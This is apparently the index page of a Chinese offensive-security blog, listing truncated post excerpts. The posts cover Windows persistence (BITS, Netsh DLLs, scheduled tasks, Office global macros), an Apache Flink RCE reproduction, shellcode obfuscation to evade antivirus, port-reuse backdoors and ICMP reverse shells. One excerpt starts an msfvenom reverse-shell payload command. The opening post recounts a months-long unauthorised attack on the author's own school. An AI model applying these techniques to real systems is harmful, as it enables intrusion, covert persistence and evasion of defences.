gakkkkkkiii

爪巴 爪巴 爪巴

记一次攻击实录

记一次T攻击实录-part1

记一次攻击实录(1) 前言 对某校(自己学校)的一次长达近半年的攻击,算是落地相对成功的一次攻击。现在因为一些原因,已经结束了,把一些过程中的细节展示出来。因为对比于真正的APT攻击,我这个只能算是小儿科,没有资金,目的没有那么明确,过程中在战术制定上有很大问题,而且没有注意很多细节都有可能或者是已经暴露了自己,庆幸的是运维人员没那么专业也没那么敬业,我暂时没有被水表。 很多时候,前期累积...

Posted by hmoytx on November 30, 2019

Windows权限维持-BITS

Windows权限维持-BITS

Windows权限维持-BITS 简介 之前在下载payload中使用过BITS,BITS(后台智能传送服务),它可以在前台或后台异步传输文件,为保证其他网络应用程序获得响应而调整传输速度,并在重新启动计算机或重新建立网络连接之后自动恢复文件传输。Winodws提供了一个名为“bitsadmin”的工具,用于创建和管理文件传输。这里主要讲一下BITS在权限维持中的使用。 BITS使用 详...

Posted by hmoytx on November 29, 2019

Windows权限维持-Netsh

Windows权限维持-Netsh

Windows权限维持-Netsh 简介 Netsh是Windows中用于网络配置命令工具,管理员可以使用它来执行与系统的网络配置有关的任务,可以用来配置防火墙策略用于转发。Netsh可以通过使用DLL文件来扩展自身的功能,基于此功能可以用来加载任意DLL,实现权限维持。 DLL 这里的dll是用来加载的,跟直接用rundll32调用的是有区别的。这里给出函数原型: DWORD WINA...

Posted by hmoytx on November 21, 2019

Windows计划任务在后渗透中的应用

Windows计划任务在后渗透中的应用

Windows计划任务在后渗透中的应用 简介 计划任务,顾名思义,指定时间做指定的事情,对windows来说可能是执行脚本,也可能是exe。计划任务的利用不仅仅在横向渗透中,也可以是在权限维持。 利用前提 1.必须通过其他手段拿到本地或者域管理账号密码 2.若在横向渗透过程中,要保证当前机器能net use远程到目标机器上 3.目标机器开启了task scheduler服务...

Posted by hmoytx on November 21, 2019

Apache Flink RCE 复现

Apache Flink RCE 复现

Apache Flink RCE 复现 简介 Flink核心是一个流式的数据流执行引擎,其针对数据流的分布式计算提供了数据分布、数据通信以及容错机制等功能。攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。 复现 先用msf生成jar包: msfvenom -p java/meterpreter/reverse_tcp LHOST...

Posted by hmoytx on November 14, 2019

静态免杀尝试

shellcode混淆免杀

静态免杀尝试 前言 在实际中碰到一些问题,直接用cs生成的payload过不了杀软,这时需要简单的处理下,参考了一些思路,写了几个测试demo,尝试了一下效果还可以。 实测 这里我是写了个shellcode加载代码,烂大街了,用来加载cs生成的shellcode。 贴几个常用的加载代码(C加载shellcode的): 第一种: #include <windows.h> #in...

Posted by hmoytx on November 12, 2019

端口复用技术(下)-iptables

linux下的端口复用技术

端口复用技术(下)-iptables 简介 在linxu中进行端口复用没有像在windows中那样方便,需要通过iptables nat表中的PREROUTING 链配合REDIRECT进行端口流量转发来完成“端口复用”。 比如在服务器的PREROUTING链里面加一条规则,将到本机80端口的流量REDIRECT到22端口,就算80端口此时正在被Apache监听,此流量也能成功到达22端口...

Posted by hmoytx on November 7, 2019

端口复用技术(上)-winRM

windows下的端口复用技术

端口复用技术(上)-winRM 原理 基本原理是使用Windows 的远程管理管理服务WinRM,组合HTTP.sys驱动自带的端口复用功能,一起实现正向的端口复用后门。 WinRM服务 WinRM全称是Windows Remote Management,是微软服务器硬件管理功能的一部分,能够对本地或远程的服务器进行管理。WinRM服务能够让管理员远程登录Windows操作系统,获...

Posted by hmoytx on November 5, 2019

关于ICMP隧道的应用

ICMP反弹shell以及隧道搭建

关于ICMP隧道的应用 ICMP简介 ICMP(Internet Control Message Protocol)Internet控制报文协议。它是TCP/IP协议簇的一个子协议,用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据,但是对于用户数据的传递起着重要的作用。 ICMP使用IP的基本支持...

Posted by hmoytx on November 2, 2019

Office权限维持初探

Office权限维持初探 迎接11月

Office权限维持初探 简介 涉及office的内容多在宏上,关于宏的创建这里不多说,主要讲一下全局模版在权限维持中的作用。 全局宏 全局宏是对所有对应的文档都有效的,即使文档本身不含有宏,也是可以执行全局宏的,只要本地全局模版被替换成含有恶意宏的文档,就可以在任意对应文档打开时执行,且杀软不会主动查杀这个模板。 测试 测试版本2016。 首先,因为这个全局宏并没有一个固定的名称,只...

Posted by hmoytx on October 31, 2019

FEATURED TAGS
python PyQt5 QtDesigner python OpenCV PyTorch machine learning 渗透测试 大黑阔 工具 漏洞挖掘 实战 SQL注入 漏洞 Cobalt Strike 红队 漏洞复现 渗透 内网 免杀 白名单 内网渗透 权限维持 后门 域渗透 技巧 溯源反制 复现 SRC挖掘 安卓逆向 CTF
ABOUT ME

gakki!gakki!gakki!

✉️ [email protected]